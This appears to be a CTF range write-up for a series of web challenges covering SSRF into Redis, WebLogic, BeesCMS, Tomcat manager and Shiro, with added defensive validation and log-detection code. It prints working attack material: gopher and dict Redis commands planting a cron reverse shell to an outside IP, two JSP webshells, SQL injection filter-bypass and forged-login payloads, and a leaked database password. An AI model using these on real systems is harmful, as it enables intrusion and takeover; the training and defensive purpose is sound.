web1-1

Had a look at the source first:

```
file:///var/www/html/index.php
```

```php
<?php
// The user-supplied URL goes straight to curl() (a helper not shown here)
// with no scheme or destination check: that is the SSRF.
$url = $_POST['url'];
if($url){
    echo "<b>".$url." 的快照如下:</b><br><br>";
    echo "<pre>";
    curl($url);
    echo "</pre>";
}
?>
```
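As the defender-side counterpart to that handler, here is an added example (not code from the challenge or from the original write-up) of the check a "snapshot" endpoint should run before it fetches anything: a scheme and port allowlist, then every address the host resolves to checked against private, loopback and other non-routable ranges. Everything under `FAKE_DNS` and `fake_resolver` is constructed so the check can be exercised offline; the addresses in it are assumptions, not real hosts.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# A snapshot feature only ever needs plain web fetches.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses (no RFC 1918, loopback,
    link-local, documentation, reserved or multicast ranges)."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_snapshot_url(url: str, resolver=socket.getaddrinfo):
    """Return (ok, reason). `resolver` is injectable so the check can be tested offline."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed"
    if not parts.hostname:
        return False, "missing host"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} is not allowed"
    try:
        infos = resolver(parts.hostname, port or 80, proto=socket.IPPROTO_TCP)
    except socket.gaierror as exc:
        return False, f"cannot resolve {parts.hostname}: {exc}"
    # Check every address the name resolves to, not just the first one.
    for _family, _type, _proto, _canon, sockaddr in infos:
        if not is_public_address(sockaddr[0]):
            return False, f"{parts.hostname} resolves to non-public address {sockaddr[0]}"
    return True, "ok"


# Constructed resolver so the demonstration does not depend on real DNS.
FAKE_DNS = {
    "public.example": "93.184.216.34",    # stands in for an ordinary internet host
    "internal.example": "172.18.240.7",   # resolves into the private range
    "172.18.240.7": "172.18.240.7",
}


def fake_resolver(host, port, proto=0):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed: no such host {host}")
    return [(socket.AF_INET, socket.SOCK_STREAM, proto, "", (FAKE_DNS[host], port))]


if __name__ == "__main__":
    for candidate in ("http://public.example/page",
                      "file:///var/www/html/index.php",
                      "dict://172.18.240.7:6379/keys *",
                      "http://172.18.240.7:6379/",
                      "http://internal.example/"):
        print(candidate, "->", validate_snapshot_url(candidate, fake_resolver))
```

Two caveats a practitioner would add: the fetch itself should connect to the address that was validated (pin it, or re-check in the connect hook) so a DNS answer that changes between check and fetch cannot slip a private address through, and in PHP the curl handle should also get `CURLOPT_PROTOCOLS` and `CURLOPT_REDIR_PROTOCOLS` restricted to `CURLPROTO_HTTP | CURLPROTO_HTTPS`, otherwise a redirect from an allowed host can reintroduce gopher://, dict:// or file://.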

web1-3
Key point: write a cron job through Redis to get a reverse shell back to a VPS
Requesting file:///etc/hosts returns content:

Then brute-forced the C-class range and ports
and found an unauthenticated Redis at 172.18.240.7

So the play is SSRF to Redis for a reverse shell
Hands-on: SSRF to Redis reverse shell in practice - yaoguyuan - Cnblogs

```
gopher://172.18.240.7:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/101.200.39.193/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A/var/spool/cron/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
```

But it never called back? I URL-encoded it once more and tried again, still nothing; switched to the approach below, success!

```
dict://172.18.240.7:6379/flushall
dict://172.18.240.7:6379/config set dir /var/spool/cron
dict://172.18.240.7:6379/config set dbfilename root
dict://172.18.240.7:6379/set x "\n* * * * * /bin/bash -i >& /dev/tcp/101.200.39.193/5000 0>&1\n"
dict://172.18.240.7:6379/save
```

GitHub - xmsec/redis-ssrf: redis ssrf gopher generater & redis ssrf to rce by master-slave-sync
Originally went with this method, but it didn't work...
web1-2
Key point: connecting to the Redis service over the DICT protocol
Connect to Redis via DICT and grab the flag

```
dict://172.18.240.7:6379/keys *
```

```
dict://172.18.240.7:6379/get:flag
```
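From the detection side, the gopher:// and dict:// requests in the two Redis sections above leave a very recognisable trace in whatever logs the fetched URL (the application itself, or an egress proxy). The added example below (my code, not from the write-up or the xmsec tool) decodes both URL forms back into the Redis commands curl would send: a small RESP parser for the gopher selector, and for dict:// the libcurl behaviour of sending the path as one request line with ":" turned into spaces, which is why `get:flag` works. It then flags CONFIG SET dir/dbfilename, SAVE/FLUSHALL, cron-style lines and /dev/tcp/ redirections. `SAMPLE_LOG`, its log format and the 203.0.113.9 address are constructed for the demonstration.

```python
import re
import shlex
from urllib.parse import unquote_to_bytes, urlsplit

REDIS_PORTS = {6379}
PATH_PARAMS = {"dir", "dbfilename"}  # CONFIG SET keys that steer where SAVE writes
WRITE_COMMANDS = {"save", "bgsave", "flushall", "slaveof", "replicaof"}
CRON_RE = re.compile(r"^\s*(?:[\d*,/-]+\s+){5}\S", re.M)  # five schedule fields + command


def parse_resp(data: bytes):
    """Decode RESP multi-bulk frames (*<n>\\r\\n$<len>\\r\\n<arg>\\r\\n...) into argument lists.
    Bytes outside a frame, such as the padding newlines gopher payloads carry, are skipped."""
    cmds, i = [], 0
    while i < len(data):
        if data[i:i + 1] != b"*":
            i += 1
            continue
        end = data.index(b"\r\n", i)
        argc, i = int(data[i + 1:end]), end + 2
        args = []
        for _ in range(argc):
            if data[i:i + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {i}")
            end = data.index(b"\r\n", i)
            length, i = int(data[i + 1:end]), end + 2
            args.append(data[i:i + length].decode("utf-8", "replace"))
            i += length + 2
        cmds.append(args)
    return cmds


def commands_from_url(url: str):
    """Recover the Redis commands a gopher:// or dict:// URL makes curl send."""
    parts = urlsplit(url)
    raw = unquote_to_bytes(parts.path)
    scheme = parts.scheme.lower()
    if scheme == "gopher":
        return parse_resp(raw[2:])  # drop "/" and the one-character gopher item type
    if scheme == "dict":
        # libcurl sends the path after "/" as one request line, turning ":" into spaces.
        line = raw[1:].decode("utf-8", "replace").replace(":", " ")
        try:
            return [shlex.split(line)]
        except ValueError:
            return [line.split()]
    return []


def analyze_url(url: str):
    """Findings for one fetched URL; an empty list means nothing suspicious."""
    parts = urlsplit(url)
    findings = []
    if parts.scheme.lower() not in ("http", "https"):
        findings.append(f"non-http scheme {parts.scheme.lower()}")
    if parts.port in REDIS_PORTS:
        findings.append(f"targets redis port {parts.port} on {parts.hostname}")
    for cmd in commands_from_url(url):
        if not cmd:
            continue
        name = cmd[0].lower()
        if (name == "config" and len(cmd) >= 4 and cmd[1].lower() == "set"
                and cmd[2].lower() in PATH_PARAMS):
            findings.append(f"redis CONFIG SET {cmd[2].lower()} = {cmd[3]}")
        elif name in WRITE_COMMANDS:
            findings.append(f"redis {name.upper()}")
        for arg in cmd[1:]:
            text = arg.replace("\\n", "\n")  # dict payloads carry newlines as two characters
            if CRON_RE.search(text):
                findings.append("cron-style schedule line inside a redis value")
            if "/dev/tcp/" in text:
                findings.append("/dev/tcp/ redirection inside a redis value")
    return findings


# Constructed sample of what the application or an egress proxy might log for the
# snapshot endpoint: timestamp, client, request line and the URL that was fetched.
# 203.0.113.9 is a documentation address standing in for the attacker's VPS.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.5 POST /index.php url=http://example.com/",
    "2024-05-01T10:00:07Z 10.0.0.5 POST /index.php url=file:///etc/hosts",
    "2024-05-01T10:00:20Z 10.0.0.5 POST /index.php url=gopher://172.18.240.7:6379/_"
    "%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset"
    "%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A/var/spool/cron/%0D%0A",
    "2024-05-01T10:00:31Z 10.0.0.5 POST /index.php url=dict://172.18.240.7:6379/config set dbfilename root",
    "2024-05-01T10:00:32Z 10.0.0.5 POST /index.php url=dict://172.18.240.7:6379/"
    'set x "\\n* * * * * /bin/bash -i >& /dev/tcp/203.0.113.9/5000 0>&1\\n"',
    "2024-05-01T10:00:40Z 10.0.0.5 POST /index.php url=dict://172.18.240.7:6379/get:flag",
]
LOG_RE = re.compile(r"^(\S+) (\S+) \S+ \S+ url=(.*)$")


def scan_log(lines):
    """(timestamp, client, findings) for every log line whose fetched URL is suspicious."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := analyze_url(m.group(3))):
            alerts.append((m.group(1), m.group(2), findings))
    return alerts
```

On the Redis side the same sequence is visible without any URL decoding: a CONFIG SET dir into a cron, web-root or .ssh directory followed by SAVE from a client that is not the application is the signature to alert on, and `rename-command CONFIG ""` plus `requirepass` and `protected-mode yes` in redis.conf remove the primitive the whole chain depends on.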

web2-1
Key point: WebLogic CVE
[Error notes] Accessing the project throws Error 404–Not Found | From RFC 2068 Hypertext Transfer Protocol - CSDN blog
Visiting /console gives:

Searched WebLogic vulnerabilities directly
Notes on exploiting a WebLogic 10.3.6.0 range _ WebLogic 10.3.6 vulnerabilities - CSDN blog
Must-read | The most complete WebLogic vulnerability reproduction - Tencent Cloud developer community
The first article points to a tool; use it and grab the flag directly


web2-2
Key point: WebLogic CVE_2016_0638_ECHO + decrypting WebLogic ciphertext to get the database password
Next, following this article:
Notes on exploiting a WebLogic 10.3.6.0 range
Strip the extra characters after the port and enter /uddiexplorer/
Picked an arbitrary image path from the top right:

```
http://119.45.164.136:7001/uddiexplorer/help.gif
```

Copy the image file name and look it up on the WebLogic host with a command.

Then pwd to see the current directory:

```
/root/Oracle/Middleware/user_projects/domains/base_domain
```

Then join the paths:

```
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/
```

This path is the one we can upload files to.
Then upload the shell:

```jsp
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
```

Connect with AntSword.
Upload fscan, chmod it, and check the IP with ifconfig:

```sh
./fscan -h 172.16.10.0/24,172.25.20.0/24,172.26.30.0/24
```
```
[*] LiveTop 172.25.20.0/24 段存活数量为: 3
[*] LiveTop 172.16.10.0/24 段存活数量为: 2
[*] LiveTop 172.26.30.0/24 段存活数量为: 1
172.26.30.1:7001 open
172.25.20.10:7001 open
172.16.10.1:7001 open
172.16.10.8:7001 open
172.26.30.1:6379 open
172.16.10.1:6379 open
172.25.20.12:3306 open
172.26.30.1:22 open
172.25.20.1:22 open
172.16.10.1:22 open
172.16.10.1:8082 open
172.26.30.1:8081 open
172.16.10.1:8081 open
172.26.30.1:80 open
172.16.10.1:80 open
172.26.30.1:8082 open
172.26.30.1:8848 open
172.16.10.1:8848 open
[*] WebTitle http://172.26.30.1 code:200 len:1925 title:Hello!
[*] WebTitle http://172.16.10.1 code:200 len:1925 title:Hello!
[*] WebTitle http://172.26.30.1:8081 code:200 len:11217 title:Apache Tomcat/11.0.14
[*] WebTitle http://172.16.10.1:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.26.30.1:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.16.10.1:8081 code:200 len:11217 title:Apache Tomcat/11.0.14
[*] WebTitle http://172.26.30.1:8082 code:200 len:15928 title:BEES企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站�
[*] WebTitle http://172.16.10.1:8082 code:200 len:15928 title:BEES企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站�
[+] PocScan http://172.16.10.1:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.26.30.1:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.16.10.1:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.26.30.1:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[*] WebTitle http://172.16.10.8:7001 code:404 len:1164 title:Error 404--Not Found
[*] WebTitle http://172.25.20.10:7001 code:404 len:1164 title:Error 404--Not Found
[*] WebTitle http://172.16.10.1:7001 code:404 len:1164 title:Error 404--Not Found
[*] WebTitle http://172.26.30.1:7001 code:404 len:1164 title:Error 404--Not Found
[+] Redis 172.16.10.1:6379 unauthorized file:/tmp/redis.log
[+] InfoScan http://172.26.30.1:7001 [weblogic]
[+] InfoScan http://172.25.20.10:7001 [weblogic]
[+] InfoScan http://172.16.10.8:7001 [weblogic]
[+] InfoScan http://172.16.10.1:7001 [weblogic]
[+] Redis 172.26.30.1:6379 unauthorized file:/tmp/redis.log
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2020-14750
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-ssrf
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2019-2729-1
[+] PocScan http://172.16.10.8:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] PocScan http://172.26.30.1:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] PocScan http://172.16.10.1:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] PocScan http://172.25.20.10:7001 poc-yaml-weblogic-cve-2019-2725 v10
```
The assets further down belong to later challenges; this one is obviously about 172.25.20.12:3306, so we need the database username and password.
Reference: [Decrypting every kind of WebLogic ciphertext](https://blog.csdn.net/mashiro_hibiki/article/details/138810444)

> WebLogic ciphertexts come in two kinds: database connection strings, and the console login username and password.
> Database connection strings are generally in the `**jdbc.xml` files under the config/jdbc directory.
> Key file: SerializedSystemIni.dat, default location:
> /root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

```
{AES}ZhArsOkXPBA9AvAwRxNxpK4G0WlHlpNFBZVsu+PDlYU=
```

```sh
cat ./security/SerializedSystemIni.dat | base64
```

```
BNnQ4ugCIIdQsPqblVIj9ILs/o1Wl+QiTx2coQCBU/wdo4laQlBoGDGGuIqvgnI9KKgiD58oczjY
xfmvNlHH5w==
```

Decrypts to: Meetsec#1024
Then set up a proxy with Stowaway
and connect to the database from Kali through the proxy:

```sh
proxychains mysql -h 172.25.20.12 -u root -p --ssl=0
```

Then enter the password.
The flag is in the value of the table_name table in data.

web2-3
```sql
SELECT LOAD_FILE('/flag');
```

web3-1
Scan for sensitive files, then visit the file to get the flag.


web3-2
Key point: heapdump leaks database credentials
Found /actuator/heapdump; check what information is in it

Decrypt it to obtain the sensitive information

Connect to the database with Navicat and get the flag:

```
meetsec-web3{flag2-9edbd4b03b5f86a9abe079bc63ea847b}
```
web4-1
Key point: BeesCMS login page + file upload RCE
Solution 1: error-based SQL injection

```
admin' or updatexml(1,concat(0x7e,select database(),0x7e),1)#
```

```
admin' and updatexml(1,concat(0x7e,select group_concat(table_name) from information_schema.tables where table_schema='beecms',0x7e),1)#
```

and, where, =, from and select are filtered; bypass with double-writing + spaces (oddly, the database-name query above wasn't filtered)

```
admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(table_name) fr from om information_schema.tables whe where re table_schema like database()),0x7e),1)#
```

```
admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(column_name) fr from om information_schema.columns whe where re table_name like 'bees_admin'),0x7e),1)#
```

```
admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(admin_password) fr from om bees_admin),0x7e),1)#
```

Got the MD5 hash 2446d54c2e68d221db9cff653b01a0e, which cracks to login123
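Why the double-writing works, and what actually fixes it, is worth spelling out. The added example below is mine (not the CMS's code): `naive_filter` models the behaviour the payloads above imply, i.e. `select` and `=` stripped wherever they appear and `and`/`from`/`where` stripped together with their surrounding spaces, each in a single pass. Because every keyword is deleted exactly once, a keyword wrapped around a second copy of itself (`selselectect`, `an and d`) is reassembled by the filter's own deletion. `safe_lookup` shows the parameterised query that makes the filter unnecessary; it uses sqlite3 as an offline stand-in for MySQL, and the `bees_admin` rows in `setup_demo_db` are constructed.

```python
import re
import sqlite3

# Blacklist modelled on the behaviour the write-up reports: "select" and "=" vanish wherever
# they occur, while "and", "from" and "where" are removed with their surrounding spaces.
BARE_KEYWORDS = ("select", "=")
SPACED_KEYWORDS = ("and", "from", "where")

# The double-written payload from the write-up (table-name extraction).
PAGE_PAYLOAD = ("admin' an and d updatexml(1,concat(0x7e,(selselectect group_concat(table_name) "
                "fr from om information_schema.tables whe where re table_schema like database()),0x7e),1)#")


def naive_filter(user_input: str) -> str:
    """Single-pass keyword stripping: each keyword is removed once, so a keyword split
    around a second copy of itself is put back together by the deletion."""
    for kw in BARE_KEYWORDS:
        user_input = re.sub(re.escape(kw), "", user_input, flags=re.I)
    for kw in SPACED_KEYWORDS:
        user_input = re.sub(" " + kw + " ", "", user_input, flags=re.I)
    return user_input


def vulnerable_query(username: str) -> str:
    """The SQL text that filter-then-concatenate produces; shown here, never executed."""
    return f"SELECT admin_name FROM bees_admin WHERE admin_name = '{naive_filter(username)}'"


def setup_demo_db():
    """Constructed stand-in for the CMS admin table (the hash value is a placeholder)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bees_admin (admin_name TEXT, admin_password TEXT)")
    conn.execute("INSERT INTO bees_admin VALUES ('admin', 'constructed-hash-placeholder')")
    conn.commit()
    return conn


def safe_lookup(conn, username: str):
    """Parameterised lookup: the value travels separately from the SQL text, so the
    username is compared literally and no keyword filtering is needed at all."""
    row = conn.execute("SELECT admin_name FROM bees_admin WHERE admin_name = ?",
                       (username,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(naive_filter("selselectect"), naive_filter("an and d"))
    print(vulnerable_query(PAGE_PAYLOAD))
    db = setup_demo_db()
    print(safe_lookup(db, "admin"), safe_lookup(db, PAGE_PAYLOAD))
```

Looping the filter until nothing changes closes the double-writing trick but is still a blacklist (it breaks legitimate words containing `and`, and misses comment and encoding tricks); the parameterised form is the fix, with the blacklist at most as a monitoring signal.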
Solution 2: forged SQL login

```
user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456
```

[Code audit] BeesCMS 4.0 vulnerability summary _ bees cms vulnerabilities - CSDN blog
Solution 3: variable overwrite to bypass login
Another method: variable overwrite
Reproducing multiple BeesCMS 4.0 vulnerabilities - 灰信网 (software development blog aggregator)
POST:

```
Exp:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999
```

Then visit admin/admin.php.

Then following this article:
BeeS CMS range vulnerability walkthrough _ beescms vulnerabilities - CSDN blog
Upload the file.

Then connect with AntSword.

web5
Key point: Tomcat manager brute force + file upload through the manager to get a shell
The manager is at manager/html by default
Brute-forcing a Tomcat manager password (with Python script) _ tomcat manager login wordlist - CSDN blog
Decoded: tomcat:qwe123
Then upload the webshell cmd2.jsp (zip it into cmd2.zip, rename the suffix to .war and upload)

```jsp
<%-- cmd2.jsp --%>
<%
if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
```

Multiple ways to get a shell from the Tomcat manager _ tomcat getshell - CSDN blog
web6
Key point: one-click with LiqunKit
web7-1
Key point: Shiro deserialization

But the key couldn't be found
Ran fscan and found Nacos
Logged in with the weak credentials nacos/nacos and found the key in the configuration
Then it's just the Shiro deserialization
Notes on a company's second-round interview range - sawtooth384's blog
Detailed walkthrough of a tech company's second-interview web range - Xianzhi Community